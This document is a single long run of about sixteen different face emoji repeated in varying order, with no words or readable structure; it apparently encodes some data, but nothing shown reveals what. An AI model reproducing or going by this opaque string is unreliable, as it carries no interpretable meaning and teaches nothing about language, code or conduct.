😊🙃😝😄🤣😊😂😆🤣😂😅😜😜🙂🤪😃😝😜😅🙃😜😁🤣😊🤪😆😇😀😇😀🤣🙃😅😄😆😊😁😆😄😅😃😉🤪😄😜😊😄😃🙂🙃😇😄😊😊😉🙃😅😆😂😇😉😅😂😜😃🤣😆😀😜🙃😁😁😉😊😅😅😃😂😃😀🙂🙂😇😃😊😉😉🙂🤪😜😁😆🤪😉😄😜😅😁😁🙃😀😇😊😁😊😂😜😝🤪😇😁😜😁😂😇😀😊🙃😉🤣😅😀😝🙂😃🤪😊😊😃😁😄😊😂😃🤣😉😃😁😀😊😜😊😅😁🤪😝🙃🤣😀🙃😝😃🙃😉🙂😁😂😝🙂😂😜🤪😆😂😆😀😄🙃😊😄😀😉😜😁🤪🤪😝😅😇🤪😊😂😊😀🙃🙃🙃😄😂😊😉😆😅🤪🤣🤣😁😜😄🙂😆😃😀😉😃😄🤪😊😝😆😇🤪😝🤣😉😜🙃🙂😇😃😂😉🤪😁😅😇😆😅😁😜😆😂😃😀😀🙃😆😃🤪😊🤣😁😇😇😊😅😉😜😊😂🙂😀😂🙃😇😄😅😊😉😆😁😝😄🤣😃😜😀😂😜😀🤪😉😀😄😇😇😃😆😉😝😊🤣🙂😜😂🙂🤣😃😅😉😅😁😁😇😅😅😃🤪😄🤣😜😃😀🙂😝😃😇😉😝😁😉😝😁😅🙂🤪😂😂🤣😄😅🙃😆😄😁😊😆😆😃😝😄😅😜😜😄😂😝😃🤪🙃😊😄😉😊😝😆🙂😝😉🤣🤣😜😅🙂😆😃😁😉😄😁😃😇😄😆😜🤪😄🤣😝😜🤪🙂😊😁😉😉🙃😁🙂😇🙃😅🤣🤪😂😂😆😀😉🙃😄😆😃😊😀😁😜😝😀😅😝🤪🤪😂😊😀😜🙃🙃😆🙂😊😂😆🤣😝😂🤣😆😜😅🙂😄😃😄😉😀😁😅😀😉😆😝🤪😀🤣😊😜😉🙂🙃😃🙃😉😂😁😂😇😅😅😆🙂😀😂😄😀😃🙃😀😄😀😉🤪😁😝😇😇😅😊😉😇😂🙃😀😉🙃😂😄😉😊😅😆😅😝😁🤣😄🙂🙃🙂😀😀😜🙃🤪😄🤪😊😇😆😊😝😉🤣😉😜🙂🙂😂😃🤣😉😜😁😆😇😁😅😄🤪😆😂🙃😜😜🙂🤪😃😝😄😁😉😉😁😇😇😆😅😊🤪😂🤣😂😜🙂🙂🙃😆🙃😆😜😝😃🤣😀🤪😜😇😃🙂😄😀🤪🙃😝😃😜😊😂😆😇😉😉😅😂😜😄😂🙃😃😅🙃😁🙂🙂😅🤣😝😜🤣🤪😜😝😇😜🤣😃😃😇🙃😉😁😅😊😇🤪🙃😂😇😀😆🙃😁😄😄😀😂😉😅😁😄😝😄😅😇🤪🤪😁😝😇🤪😁😄😊🙂😆😂😝🤣😉😂🤣🙃😜😂🙂🤣😃😀🙃🤪😜😃😉😁😆😝😁😄😜😊🙂😉😃🙃😉🙂😁😂😇🤣😅😅🤪😆🤣😊😀🤣🙃😃😄😀😉😜😊😅😄🤪😇😅😅😜😝🤪😀🙃🙃🙂😄😂😊🤣😆😅😝😆😅😁😁😃😃😂😃😁🙃😜😄🤪😊😝😊😉😆😀🤪😃😇😀🙃😁😃😂😉🤣😁😅😀🤣😇🙂😅🤣🤪😅🤣😜😜😝😅😀😜😃😉😊😆😄😇🙂😀😁😂🙂😀😂🙃🤣😄😅🙃🙃😆😁😝😄🤣😃😜😀😂😜😀🤪🙃😝😆😇😊😊😆😉😝🙃🤣🙂😜😂🙂🤣😃😜😉😆😆😅😇😄😅😃🤪😄🤣😜😀😄🙂😝😃😇😉😊😅😉😇🙃😅🙂🤪🙃😂🤣😀😂🙃😆😄😇😊😄😅😁😝😀😅😜😜😃😂😝😃😄🙃😊😄😉😊🙃😅😉😝😂🤣🤣😜🙃🙂😆😃🙃😉😄😁😃😇😀😆😜😝🤪🤣😝😜🤪🙂😊😃🤪😉🙃😁😉😇😂🤣🙂🤪😅😂😆😀🤣🙃😄😄😄😊😀😁😜😇🤪😂😝🤪😇😂😊😀😝🙃🙃😄😊😊😂😆🙂😝😅🙂😆😜😁🙂😄😃😆😉😀😁😄😊🤪😅😀😝😇🤣😊😜😉🙂🙃😃🙂😉😂😁🙃😇😅😅😅🤪😁🙂😆😀😃🙃😀😃😜😉🤪😆😆😇😇😅😊🤪😉🙂😊😀🙂🙃😂😄😂😊😅😆😇😝😁🤣😄😜😃🙂😀😀😜🙃🤪😄😝😊😇😆😝😝😉🤣😉😜🙂🙂😂😃🤣😉😅😁😆😇😁😅😄🤪😃😂😀😜😜😉🤪😃😝😉😇😁😊😇😉😅🙃🤪🙂😂😇😀🤣😉😂😄😆😊😁😆😆😝😃🤣😆🤪😜😂🤪😀😝😊😇😄😊😊😉😆😊😝🙂🤣🙃😜🤣🙂🤪😃😆😊😅😁😄😇😃😅😁😝😜😂😆😜😝🙂😇😃😊😊😇😁🙃😇🙂😅😊🤪🤣😂😊😀😆🙃😁😄😄😊😃😆😀😇😜🤣😀🤪😝🙂😀😀😊🙃😇😄🙃😇😉😆😂😝🤣🤣🙂😜😆🙂😆😃😄😉😃😁😀😝😜😆🤪😝😝🤣😜😜😊🙂😝😃🙃😉😉😁😂🤪🤣😅😅🤪😆😂🤣😀😄🙃😆😄😀😊😄😁🤪😇😝😅😇🤪😊😂😉😀🙃🙃😊😄😂😊😂😆😅😝😆🤣😁😜😄🙂😃😃😀😉😀😄🤪😊😝😆😇😝😊🤣😉😜🙃🙂🙂😃😂😉😂😁🙃😇😆😅😁🤪😄🤣🙃😀😆🙂😜😃🤪😉😝😊😁😄😇😇😁😅😝😂😀😀😜🙃🤣😄😅😊😆🙂😊😆😂😇🤪😅😃🤪😝😂😝😀🤣🙃😀😊🤪😅😁😝🙃🤣🙂😜😂😝😝😂🤣😃😀🙃🤪😃😅😇😃😆😅😝😆🤣😄😅😆😄😅😉😊😁😉😇🙃🙃😊😆😜😝😂😂😂😜😅🙂🤣😄🤣😉🤣😆😄🤣😉🤪🤪😂😝😀😇😉😝😜😉😊🙃😆🙃😝😂🤣😂😜😅🙂😆😃😁😉😄🙃😜😇😀😅😀😝🤪🤣🤪😜😇🙂😝😃😉😉😜🤣😅😇😂😅😂🤪😅😂🙃😀😁🙃😁😄😃😊😃😁😜😝😄🤣😜🤪😇😂😊😀😉🙃🤪😄🙂😊🙂😆🤣😝🙃😂🤣😜😁🙂😄😃😃😉😉😄😜😊😜😆😝😝😇🤪😁😜😉🙂😉😃🙂😉😂😁🤣😇😅😅😆😀😁🤣😃😀😃🙃😃😃😜😉😜😁😝😝😀😅😊😀😉🤣🙂😀🙂🙃🙂😄🤣😊🤣😆😆😝😅🤣😄😀😃😄😃😀😜🙃😜😄😝😊😜😆😊😝😉🤣🙃😜😇🙃🙃😃🤣😉😅😁😆😇😁😅😄🤪😄😂😀😜😜😄🤣😃😝😉😇😁😊😇😊😅🙃🤪🙂😂😂😀🤣🙃😅😄😆😊😁😆😁😝😁🤣😀🤪😜😂🤪😃😀😉😃😄😊😊😉😆🙃😆🙂😇😉😅😂😜😃🙂😀😀🙂😁🤣😇😃😅😀😝😜🤪😅😅🤪😜😅🙂😜😊😆😁🙃😇🙂😅😂🤪😇😁😇😀😆🙃😁😄😄😊😉😆😀😝😀😅🤪🤪😝😂😇😀😜😉😇😄🙃😊🙂😆😂😝😜🤣😅😜😅🙂😁😄😆😂😃😁😀😇😀😆🤪😝😜🤣😇😜😊🙂😉😃🙃🙂😅😁😂😇😂😅😅🤪😅😂😁😀😁🙃😃😁😄😂😜😁🤪😇🤪😅😇🤪😇😂😉😀🙃🙃🙂😄😝😀😄😆😅😝🤣🤣😁😜😄🙂😃😃😃🙃😜😄😜😊😝😆😇😁😁🤣😉😜🙃🙂🙂😃😂😉🤣😁😅😇😆😅😁😃🙂😂😃😀😃🙂😜😄😀😉😝😁😝😇😊😅🤪😜😊😂🙂😀😂🙃🤣😄😅😊😆😆😆😝😄🤣😃🙂🙂😂😜😀🤪🙃😝😄😝😊😊😆😉😝🙃🤣🙃😜😂🙂🤣😃😅😉🙂😁😁😇😄😅😃😂🤣😂😁😜🤪🙂😝😃😇😜😁🙃😜😄😉😊😇😂😝😂😝😀😅🙃😆😄😁😜🤣😉🤣😆😁😝😁🤣😀🤪😇🙂😅😇😜😁😁😊🙃😆🙂😝😂😉🙃😅😝🤪😅🙂😅😀😁🙃😆😁😆😊😆😅😀😉😃😀😀🙂😊😃😉😉🙃🙂😅😄😇😇🙃😆😝😂😊😀😁🙃😄😄😃😊😀😅😝😇🤪😅😝🤪😇😂😊😀😉🙃🙃😄🙂😝😂😆🤣😝😅🤣😆😜😁🙂😄😃😃😉😁😄😜😝🤪😆😝😝😇🤣😊😜😉🙂🙃😃🙂😉🙂😁🤣🤪😅😅😆🤪😁😂😄😀😃🙃😀😃😜😊😄😁😝🤪😇😅😊🤪😉😂🙃😀🙂🙃😂😄🤣😊😂😆😆😝😁🤣😄😜😃🙂😀😀😜😉😀😄😝😊😝😆😊😝😉🤣🙃😜🙂🙂😂😃🤣😉🤣😁😆😇😁😅😄🤪😃😂😀😜😜🙂🤪😃😝😉😝😆😅😇😉😅🙃🤪🙂😝😇😀😇🙃😅😄😆😊😁🙂😂😆😂😇😅😅😝😜😄🙂😀🤣😁😁😃😊😉😆🙃😝🙂😉🙂😅🙃😜🙃😂😝😃😄😉😀🙂😂😅😀😝😜🤣🤪😜😝🙂😇😃😊🙃😉😂🙂😅🤪🤣🙂🤪🤣😂😅😀😆🤪😅🙂😂😄😃😉😇😁🙂😇😃😆🤪😜😀😂😀😜🤪😂😇😄😇😊🤣😆🙂😇🤣😅😊🤪🙂😆🤣😉😊😁😀😊😜😆🤪😄😆😝😃🤣😜😝😝😂🤪😃😉😉😝😄😜😊🙂😆🙃😂🤣😀🙂🙃😃😄😀😉😜😊😁😁😊😇😇😆😇😝😝😂😆😜😇😄😂😊🤣😆😅😝😆🤣😁😜😄😝😅😅😀😉😄😁😄😊😝😆😇😝😊😝😃😅😉😜😅😂😇😁😊😁😅😇😆😅😁🤪😄😂😃😀😀🙂😜😅🤪😃😄😆🤣😇😊😅😉🤪🙃😊🤪😂😀😀🙂🙂😉😀😂😉🙂😆😆😝😂😅😅😜😃😃😝🙃😝😄😇😊😊😆😉😅🙂🤣🙂😜🙂🙂🤣😃😅😉😆😁😅😇😄🤣😃🤪😀🤣😜😜😜🙂😝😃😜😉😊😁😉😇🙃🙂🙂🤪😂😂🤣😀🤣🙃😆😄😇😊😄😆🙂😝😀😂😃🤪🤪😂😝😀🤪🙃😊😁😄😊🙃😆🙂😝😂🙂🤣😜😅🙂😆😃😅😉😄😁😁😇😀😅😆😝🤪😂😜😜😇🙂😊😃🤪😉🙃😁😇😇😂😅🤣🤪😅😂😆😀😁🙃😄😄😁😊😀😆😁😇🤪😅😜🤪😇🙃😊😀😉🙃🙃😄😉😊😂😆🙂😝😅🤣😅😜😁😉😄😃😃😉😀😁😃😊🤪😆😜😝😇🤣😝😜😉😉🙃😃🙂😉😂😁🙂😇😅😅🤣🤪😁😂😇😀😃😉😄😃😜😉🤪😆😃😇😇🤣😃🤪😉😂🙃😀🙂🙃😂😄🤣😊😅😆🙃😝😁🤣😁😜😃🙂😀😀😜🙃🤪😄😝😊😇😆😜😝😉🤣🤪😜🙂🙂😂😃🤣😉😅😁😆😇😁😅😆🤪😃😂😀😜😜🙂😜😃😝😉😇😁😊😇😉😅🙃🤪🙂😂🙂😀🤣🙃😅😄😆😊😁😆😄😝😃🤣😀😜😀🙂😀😀😝🙃😇😄😊😅😀😅🤣😝🙂🤣😂😜🤣😝😂😂🙃😃😃🙃🤣😄🤣😇😄😁😄🤪😄🤣😄😜😇🙂😊😀😜🙃😝😅🤪😅🤪🤪🤣😂😅😀😆😝🤣🙃😃😃😜😉🤪😁😆😇😃🤣😃🙂😄😀😊🙃😉😄🙃😊🙂😊😜😝🤣🤣🤣😜😆🙂😁😃😄😉😃😁😀😝😜😁😝😝😝🤣😝😜😊🙂😊😃🙃😉🙃😁😂🤪🤣😃😊🤪😆😂😆😀😄🙃😄😄😀😊😃😁🤪😇😜😂🤪🤪😊😂😝😀🙃🙃🙂😄😂😊🤣😆😅😝😆😄😅😜😄🙂😄😃😀😉😄😄🤪😊🤪😆😇😝😊😀😄😜🙃🙂🙂😃😂😉😂😁😅😇😆😅😁🤪😁😂😃😀😀🙂😜😃😜😉😝😁😇😇😊😅😄🤪🤪😂🙂😀😂🙃🤣🙃😅😃😂😉😆😁🤪😇😝😜😆😂😜😀🤪🙃😝😁🤪🙂😊😆😉😝😉🤣🙂😜🙂🙂🤣😃😅😉😆😁😅🤪😆😅😃🤪😄🤣😜😜🤪🙂😝😃😇😉😊😁😉😜😜😅🙂🤪🙂😂🤣😀😂🙃😆😄😆😊😄😆😃🤣🙂😅😜🤪🤪😂😝😀😝🙃😊😄😉😊🙃😆🙃😝😂🤣🤣😜😅🙂🤪😃😁😉😄😁😃🙂😂😅😅😝🤪🤣😝😜😇🤪😃😂😊😃😅😉😝😄😇😇🙃🤪🙂😂😝😀😁🙃😄😄😃😜😁😉😂😄😜😇😜😆😝😝🤪😂🤪😜🤪🙃😉😊😉😆😉😝😅🤣😆😜😁🤪😜😂😄😃😆🙃😂😇😃😅😅😝😇🤣😊😜😉😝😃🙂😝😃😆🙃😂😁😁😇😁😆😇😝🤣😜🙃🙃😆😃😜😉🤪😁😝😁😁😊😇😅😂😝🤪🙃🤪🙃🤪😄🤣😊😅😆😆😄😁😇🤪😅😄😜🙃😂😆😃😀😉😀🙂😁😆😜😝😉🤣🙃😜🙂😝😆😂😂😃😁🙃😅😄🙂😅😝🤪😃😂😀😜😜😝😉🙂😇😀😜🙃😇😁🤣😉🙃😅😆😝🙂😂😜😜😉🙃🤣😃🙂😆😂😝😃🤣😀🤪😜😝😆🤣🤪😀🙂😉😀😃😜😂😝😝😇🤣😂😜🤣🙂😅😂😇😃🙂🙃🙃😄🤣😅😊😝😜🤣🤪😜😝🙃🤪😀😜😉😉😁🙃😇🙂😅😇🤪🤣😂😅😀😆😊😁😄😄😊😃😆😀😇😜😅🤪🤪😝🙂😄😀😊😊😉😄🙃😊🙂😆😂😝🤣🤣😅😜😆🙂😊😃😄😇😃😁😀😊😜😆🤪😝😝🤣😇😜😊🙂😇😃🙃😇🙂😁😂😇🤣😅😅🤪😆😂😁😀😄🙃😅😄😀😇😜😁🤪😇😝😅😇🤪😊😂😉😀🙃🙃🙃😄😂😝🤣😆😅😝😆🤣😁😜😄🙂😃😃😀😉🤣😄🤪😇😜😆😇😝😊🤣😊😜🙃🙂😊😃😂😉🤣😁😅🤪😆😅😁🤪😄😂😄😀😀🙃😀😃🤪😊😂😁😇😝😊😅😉🤪🙃😂🙂😀😂🙃😜😄😅😊😅😆😁😝😄🤣😃😜😀😂😜😀🤪🙃🤪😄😇😊😊😆😉😝🙃🤣🙂😜😂🙂🤣😃😅😉😅😁😆😝😄😅😃🤪😀🤣😜😀😃🙃😃😃😇😉😊😁😉😁😀😊🙃😅😆😝😊😀🙂🙃😉😄😁😊😄😆😃😅😜😂😇😉😀😆🤣😁😆🤪😂😊😜😊🙃😆🙂😝😂🤣🤣😜😅🙂😆😃😁🤪😄😜😅😇😀🙂😁🤪😆🤣😝😜😇🙂😊😅😜😃😜🙃😝😁😅😇😉😅🙂😁😊😀😊🙃😄😄😃😊😀🙂😂😁😃😉😜😁🤣😇😆🤣😁😜😃😂😁😊🙃😆🤣😝😅🤣😆😜😁🙂😄😃😃🙃😀🤣🤪😊😅😆😝😝😇🤣😊😜😉🙂🙃🙃🙂🤪😝😂🤣😅😊😅😉🤪😁😂😄😀😃😀😅🙂😝😃🤪🙃🤪😄😜😇🤣😊😀😉😇😁😊😇😉😅🙃🤪🙂😂😂😄😊😉😄😜😆🙂😉😀😜🙃🤪😄😝😀😄😊😆😆😇😇🤪😆😊🤪😇🙂🙂😃😊🙃🙃😁😅😆😉🤪😂😂😀😜😜🙂🤪😅🤪😀😜😉😜😁😁😇🙂😅🤣😝😇😃😂🙃😅😄😆😊😁🙃😆😁🤣😝😀😅😊🤪😂😂😀😜😝🙃😜😃😜😉😝😄😊😝😊🤣😅😜😂😂😅😀😉🙃😂🙂🙂😅🙂😝😜🤣🤪😜😝😝🤪😅😅😊🙂😃🤣😂😜😝🙃😄😇😉🙃😀😂🙃😝😄😄😊😃😆😀😃🤣😇😁🤣😃😇😜😂😀😀😇🙃😜😄😃😉😉😁😊😅😝😜🙂🙂😁😃😄😉😃😉😂😄😀😊😂😅😃🙂😉😜😊🙂😉😃🙃😉🙂🙂😂😇🤣😅🤣🤪😆😂😁😀😄🙃😃😄😀😇😃😀🤪😇😝😅🤪🤪😊🙂😉😀🙃🙃🙂😄😂😊🤣😊😁😝😆🤣😅😜😄🙂😄😃😀😉😃😄🤪😇😁😃😁😝😊🤣😇😜🙃😉😅😃😂😉😂😁😅😇😆😅😁🤪🤣🙂😁😀😀🙂😜😃🤪😇😉😁😇😇😇😅😉😜😊😆🙂😀😂🙃🙂😄😅😇😆😆😁😝😄🤣😃😜😀😂😂😀🤪🙃😜😄😇😊😇😆😉😝😉🤣🙂😜😂🙂🤣😃😅😉🤣😁😁😇😄😅😃🤪😄🤣😜😃😀🙂😝😃😇😉🤪😁😉😇😜😅🙂🤪😂😂🤣😃😂🙃😆😄😁😊🤣😆😃😝🤪😅😜🤪🤪😂😝😃🤪🙃😊😄😉😊🤪😆🙂😝🙃🤣🤣😜😅🙂😆😄😅😉😄😁😃😇🤣😆😜🤪🤣🤣😝😜😇🙂😊😃😉😉🙃😁🙂😇😉😅🤣🤪😊😂😆😀😅🙃😄😁😃😊😀😁😜😝😀😅😝😜😁😂😊😀😝🙃🙃😅🙂😊😂😆🤣😝😂🤣😆😜🤣🙂😄😃😊😉😀😆😃😊🤪😆😝😝😜🤣😊😜😊🙂🙃😃🙂😉😂😅🤣😇😅😅😆🤪🤣😂😄😀😆🙃😀😄🤪😉🤪😆😜😇😇😅😊🤪😜😂🙃😃😅🙃😂😄🤣😊😅😆😆😝😁🤣😄😜😆🙂😀😃😆🙃🤪😄😜😊😇🤣😊😝😉🤣🙃😜😊🙂😂😃🙃😉😅😁🙃😇😁😂😄🤪😃😂😀😀😄🙂🤪😄😀😉😇😆😂😇😉😂🙃🤪🙂😂😂😀🙃🙃😅😄😂😊😁😆😝😝😃😂😄🤪😜😂🤪😃😄🙃😇😁😆😊😉😆🙃😝🙂🤣😂😜🤣🙂😅😃😉😉😁😁😆😇😃😅😀😝😜🤣🤪😜😝🙂😇😄😀😉😉😁😜😇🙂😅😂🤪🤣😂😅😀😆🙃😁😄😅😊😃😆😀😇😜😅😜🤪😝😉😄😀😊🙃😉😄🙃😊🙂😆😇😝🤣🤣🤣😜😆🙂😂😃😄😉😅😆😄😊😜😆🤪😝😝😂😃😜😊🙂😊😃🙃😉😇😆🙃😇🤣😅😅🤪😆😂😆😀😄🙃😄😄😀😉😜😝🤣😇😝😅😇🤪😊😂😊😀🙃🙃🙂😄😂😊🤣😆😅😝😆🤣😁😜😁🙂😃😃😀🙃😜😄🤪😊🤪😆😇😝😊🤣😉😜🙃😄😀😃😂😉🤣😁😅😇😅😅😁🤪😄😂😃😀😀🙂😜😃🤪😉😝😁😇😝😜😅😉🤪🙃😂🙂😁😉🙃🤣😄😅😊😆😆😁😝😄🤪😃😆😃😊😜😂😄🙃😝😄😇😊😊😆😉😝🙃🤣🙂😆😄😇🤣😝😇😉😉😁😁😇😄😅😃😊😀😜😄😇🙂🙂😉😆😉😇😀😀😃😝🤣😅🙂🤪😂😂🤣😆😂😝😜😆😊😊😆😄😊😂😁😀😁🙂😃🤪😃😆🤪😇🤪😁🙂😉😉😂😇😝😝🤣🤣😜😅🙂😆🤪😜🤣🤣😄🤣🤪🤪🙂🙃🤣😄😂😀😃😃🙂😊😃😉😉🙃😂😇😁😀😇🙃😅🙃😝😅😂😃😜😅🙂🤣😜🤣😊😃😁😝😇😉😄😜🤪😁🤣😊😀😊🙂🙃😃😉😊😉😁😉😝🤣😅🙂🙃😁😃😃😉😀😄😜😄😆😊🤣😆🤪😝😀😅😝😜😅🙂😃😀😉😉😃😄🙃😊🙃😅😂😝😂🤣😆😀😆🙂🤪😄😀😁😅😝😂😅😊🤪😉😂🙃😆😜😜😇🙃😉😜🙂😉😇😁😇😇🤪😅😅😜😄😂😆😀😇🙃😃😊😇😆😊😝😉🤣🙃😜🙂🙂😂😁😉🤪😅😇🙃😇😁😅😄🤪😃😂😀😜😜🙂🤪😅😝🤪😇😁😁😇🤪😅🙃🤪🙂😂😂😂😆😜😉🙃😇😄😂😂🤣😝😅🤣😀🤪😜😂🤪🙂😆😜😝🙃😆😄🤪😝😜😝😇🤣😂😜🤣🙂😅🤣😁😊😝😃😂🤣😄😅😁🤪😂🤣🤪😜😝🙂😇🤣😊😃🙃😉😇😁😃😇😊😆😜🤪😆😂😄😜🙂😄😉😊😃😆😀😇😜😉🤣😅😀😇🤪😅😅🤪😁🙂😄😃😀🙃😄🙃😝🤣😊😜😆🙂😁😃😄😇😃🙂🤣😊🤣😝😄😊😄😃🙂😜😀🙂😉😉😜😉😊😁😂😇🤣😅😅😄😝🤪🤣😆😁😄😂😄🙂😉😜😁🤪😇😝😉🙂😃🙃🙂😀😇🤪😀😜😂🙃🤪😁😁🤪🤣😉😂😃😜😄🙂😃😃😀🤪🤣🙃😁😁😃🙃😀😆😀😝😝😅😇🤪😝🙂😅😀😉🙃🤣😁😄😇😂😅😅😊😃😀😀🙂😜😃🤪😉😝🙂😇😇😊😅😊🤪🙃😂🙂😀😂🙃🤣😄😅😇🤣😃😁😝😄🤣😁😜😀🙂😊😀🤪🙃😝😄😇😊😊😊🙂😝🙃🤣😉😜😂🙂😂😃😅😉🤣😁😁😇🙂😃🙂🤪😀😂😃😜🤪😇😇😃😇😉😇😁😉😇🙃😅🙂🤪😊🙂🙂😀😅🙃😆😄😁😜😃😆😃😝😃😅😜😜😆😉😉😀😇🙃😇😄😉😇😃😆🙂😝🙂🤣🤣😜🤣🙂😆😃😂😊😆😁😃😇😀😆😜🤪🤣🤣😝😜😝🙂😊😃🤪😊😊😁🙂😇😂😅🤣🤪🤣😂😆😀😆🙃😄😁😁🙂😀😁😜😝😀😅😝😜🙂😂😊😀😉🙃🙃😄🙂😄😆😆🤣😝😂🤣😆😜😆🙂😄😃😄😉😀😆😃😊🤪😆😝😝🤪🤣😊😀😅🙂🙃😃🙂😉😂😁🤣😇😅😅😆🤪🤣😂😄😀😃🙃😀😃😜😉🤪😅😝😇😇😅😊🤪😝😂🙃😀😊🙃😂😁😉😊😅😆😆😝😁🤣😄😜😆🙂😀😃😃🙃🤪😁😃😊😇😆😜😝😉🤣🙃😜🙂🙂😂😆😜😉😅😁😅😇😁😂😄😉😂😂😀😀🤣🙂🤪😄😁😉😇😆😝😇😉🤣😊😁😊😂😂😀😜🙃😅😁😁😊😁😆😄😝😃😂😄🤪😜😂🤪😃😂🙃😇😁🙂😊😉😆🙃😝🙂😂🙃😜🤣🙂😅😃😜😉😁😁😅😇😃😅😀😝😜🙂😀😜😝🙂😇😄😂😉😉😁😉😇🙂😅😂🤪🤣😂😅😀😆🙃😁😄😊😊😃😆😇😇😜🤣😀🤪😝😂😇😀😊🙃😉😁😀😊🙂😅😀😝🤣🤣😂😜😆🙂🙃😃😄😉😃😁😂😊😜🤣😜😝😝🤣😝😜😊🙂😊😃🙃😉😇😆🙃😇🤣😅😅🤪😆🙃😆😀😄🙃😄😄😀😇😜😀😆😇😝🤣😁🤪😊🙂😀😀🙃😉😉😄😂😇🙂🤣😊😝😆🤣😇😜😄🙃😀😃😀🙃😜😄🤪😇😜😆😇😝😊😂😆😜🙃🙃😊😃😂😉🤣😁😅😝🤣😅😁🤪😄😂😇😀😀🙃😜😃🤪😉😝😁😇😝😝😅😉🤪🙃🙂😆😀😂🙃🙂😄😅😊😆😆😁😝😄🤣😃😜😀🙂🙂😀🤪😉🙃😄😇😊😝😆😉😝🙃🤣🙂😜😂🙂😝😃😅😉😝😁😁😇😆😅😃🤪🤣🤣😜😜🤪🙃😆😃😇🤪😆😁😉😇😉😅🙂🤪😂😂🤣😀🙃😉🤣😄😁😊😄😆😃😀🙃😅😜🤪😜😂😝😃🤪🤣😊😄😉😇😀😆🙂🤪😄🤣🤣😜😅🙂😆😁😁🤣🙂😁😃😇🙂😆😜🤪😆🤣😝😀😆🙂😊😃😉😝😃😁🙂😇😜😅🤣🤪😂😂😆😀😇🙃😄😄😅😇😄😁😜😇🤪😅😝😄😁😂😊😀😊🙃🙃😆🙂😂😝😆🤣🤪😃🤣😆😜🤪🙂😄😄😁😉😀😆😃🤪😆😆😝🤪😉🤣😊😀🙃🙂🙃😃🙂😉😂😆🙂😇😅😅😆😜😄😂😄😀😅🙃😀😃😜😉🤪😆😜😇😇😅😊😜😉😂🙃😀😝🙃😂😄🤣😊😅😅🤣😝😁🤣😄😀😄🙂😀😃🙃🙃🤪😄😝😊😇😆😊😝😉🤣🙃😀🤣🙂😂😄😂😉😅😁🤣😇😁😅😄🤪😃😂😀😀😊🙂🤪😄😊😉😇😁😝😇😉😅😜🤪🙂😂😂😃😄🙃😅😅😊😊😁😆😁😝😃🤣😀🤪😜🙂😄😃😜🙃😇😄😊😊😉🙂😀😝🙂🤣🙂😜🤣🙂😅🙂😇😉😁😁🤪😇😃😅😃😝😜🤣🤪😜😝😉😇🤪😃😉😉😆😅😇🙂🤣😁🤪🤣😂😊😀😆😊😁😃😃😊😃😆🤪😇😜🤣😆🤪😝🙂😉😀😊🙃😉😜🤣😊🙂😅😁😝🤣😂😁😜😆🙂😅😃😄😇😂😆😉😊😜😅😉😝😝😉😁😜😊🙂😊😃🙃😊😃😁😂😇😉🤣😂🤪😆😂😁😀😄😇🙂😄😀😊😀😁🤪😝😜😄😇🤪😊🙂😂😀🙃🙃😜😄😂😊🤣😆😅😝😆😊😁😜😄🙂😜😃😀😉😉😄🤪😊😝😆😇😝😊😉😀😜🙃🙃😅😃😂😉🙂😁😅😇😅😅😁🤪🙂😄😂😀😀🙃🤣😃🤪😝😄😁😇😇😇😅😉🤪😊😂🙂😀😊😉🙂😄😅😊😆😆😁😜😂🤣😃😜😃😂😜😃😆😅😁😄😇😊😝😆😉🤪🙂🤣🙂😜🙂🙂🤣😃😂😉😆😁😂😝😆😅😃🤪😀🤣😜😀😝🙂😝😃😝😉😊🤣😀😅😊😅🙂🤪🙂😂🤣😆😁🙃😆😄😆😊😄😅😄😝😀🤣😁😀😀😂😝😀😇🙃😊🤣🙂😊🙃😆🙃😝😂🤣😉😀😂🙂😆😃😁😉😄😁🙃😇😀😅😀😝🤪😂😃😀🤪🙂😊😃😉😉🙃😁🙃😇😂😅😂🤪😅😂😆🙃😊🙃😄😄😃😊😀😆😀😇🤪😅😝🤪😇😂😊😀😉🙃🙃😄🙂😊🙂😆🙂😝😅🤣😆😜😁😃😂😃😃😉😀😄😜😊🤪😆😝😝😇🤣😊😜😉😊😝😃😝😉😂😁🤣😇😅😇😆😆🤣😝😁🤣😝😜😇😁😝😉🤪😁😝😇😇🤣😝😁😄😂🙃😀😉🙃😂😄😂😊😅😆😆😝😁😂😆😁🙃🙂😀😃😄🙃🤪😄🤪😊😇😆😊😝😉😂😊😇🙂🙂😂😃😉😉😅😁🤣😇😁😅😄🤪😃😂🤣😆😊🙂🤪😄😄😉😇😁😊😇😉😅😉🤪🙂😂😊😀🤣🙃😅😇😃😊😁😆😄😝😃🤣😄🤪😜😂🤪😀😝🙃😇😇🙂😊😉😆🙃😝🙂🤣😂😜🤣🙂😅😃😆😉😁😇😜😇😃😅😀😝😜😂😃😜😝🙂😇😃😊😉😉😝🤣😇🙂😅😂🤪🤣😂🤣😀😆🙃😁😄😄😊😃😂🤣😇😜🤣😄🤪😝😂🤪😀😊🙃😊😄🙃😊🤪😆😇😝🤣🤣😅😜😆🙂😜😃😄😉😄😁😀😇😀😆🤪🤪😃😂🤪😜😊🙂😉😃🙃😊😆😁😂😇😂😅😅🤪🙂🙂😅😀😄🙃😃😄😀😇🙃😁🤪😇🤪😅😇😜😃😂😜😀🙃🙃🙂😄😂😇😅😆😅😝😅🤣😁😜😁🙂😃😃😆😊😃😄🤪😊😝😆😇🤪😉🤣😉😜😉🙂🙂😃😊😊🙂😁😅😇😆😅😁😜😇😂😃😀😃🙂😜😄😆🙃🙂😁😇😇😇😅😉😀😁😂🙂😀🙂🙃🤣😄😅😊😆😆😂🤪😆🤣😃😜😀😂😜😄🙂🙃😝😄😝😊😊😆😉😀😉🤣🙂😜😊🙂🤣😃😂😉😆😁🤣😇😄😅😃😃😃🤣😜😀😁🙂😝😃😜😉😊😁😇😇🙃😅🤪😝😄😂🤣😀🙃🙃😆😁😝😊😄😆😄😝😀🤣😆🤪🤪🙂😃😃🤪🙃😊😄😉😊🙃🤣😄😝😂🤣😂😜😅🙂😆😆😆😉😄😁😅😇😀😅😃😝🤪😂😀😜😇🙂😊😆😊😉🙃😁😝😇😂😅🙃🤪😅😂🤣😀😁🙃🙂😀😇😊😀😆😁😇🤪😂😂🤪😇😂😇😀😉🙃🤪😄🙂😊😊😅🙂😝😅🤣😆😜😁🙃😇😃😃😉😃😄😜😇😄😅😜😝😇🤣😊😜😉😉😆😃🙂😉🙂😁🤣😇😅😇😉🤪😁😂🤣😀😃🙃😀😃😜😉🤪😁😝😇😇😇😀🤪😉😂😝😀🙂🙃🙂😄🤣😊😅😆😆😝😁😂😁😜😃🙂😆😀😜😉😀😄😝😊😇😆😊😝😉😀😃😜🙂🙂😂😃🤣😉🤣😁😆😇😁😅😄🤪😄😂😀😜😜🙂🤪😃😝😉😇😁